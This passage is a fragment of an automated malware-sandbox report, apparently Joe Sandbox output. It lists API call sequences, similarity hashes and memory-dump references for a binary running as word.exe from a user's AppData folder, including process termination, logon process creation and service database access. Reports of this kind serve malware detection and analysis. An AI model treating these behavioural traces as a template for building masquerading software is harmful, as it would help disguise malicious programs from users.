                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                    • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                    • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                    • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                                    • String ID:
                                                                    • API String ID: 1640429340-0
                                                                    • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                    • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                    • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                    • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                    • String ID:
                                                                    • API String ID: 3354276064-0
                                                                    • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                    • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                    • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                    • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                    • String ID:
                                                                    • API String ID: 752480666-0
                                                                    • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                    • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                    • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                    • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                    • String ID:
                                                                    • API String ID: 3275902921-0
                                                                    • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                    • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                    • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                    • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                    • CloseHandle.KERNEL32(?), ref: 00439383
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                    • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                    • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                    • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                    • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                    APIs
                                                                    • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                    • __calloc_crt.LIBCMT ref: 0041419B
                                                                    • __getptd.LIBCMT ref: 004141A8
                                                                    • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                    • __dosmaperr.LIBCMT ref: 00414201
                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1803633139-0
                                                                    • Opcode ID: e16809dd055500cc9d55e52b2a8bb0d222df9b3cc731a1ba011baabe8b5c6d4f
                                                                    • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                    • Opcode Fuzzy Hash: e16809dd055500cc9d55e52b2a8bb0d222df9b3cc731a1ba011baabe8b5c6d4f
                                                                    • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                    • String ID:
                                                                    • API String ID: 3275902921-0
                                                                    • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                    • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                    • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                    • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                    APIs
                                                                    • SendMessageW.USER32 ref: 004554DF
                                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                    • DestroyWindow.USER32 ref: 00455678
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                    • String ID:
                                                                    • API String ID: 3691411573-0
                                                                    • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                    • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                    • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                    • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                    • String ID:
                                                                    • API String ID: 1814673581-0
                                                                    • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                    • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                    • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                    • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                    • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                    • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                    • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                    APIs
                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                    • LineTo.GDI32(?,?,?), ref: 00447227
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                    • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                    • EndPath.GDI32(?), ref: 0044724E
                                                                    • StrokePath.GDI32(?), ref: 0044725C
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                    • String ID:
                                                                    • API String ID: 372113273-0
                                                                    • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                    • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                    • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                    • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                    • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                    • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                    • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0044CBEF
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                    • MulDiv.KERNEL32 ref: 0044CC29
                                                                    • MulDiv.KERNEL32 ref: 0044CC37
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                    • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                    • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                    • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                    • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                      • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000), ref: 004356D9
                                                                    • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                    • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                    • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                    • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                    • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                    APIs
                                                                    • PostMessageW.USER32 ref: 00437127
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                    • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                    • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                    • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 00436055
                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                    • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                    • GetLastError.KERNEL32 ref: 00436081
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                    • String ID:
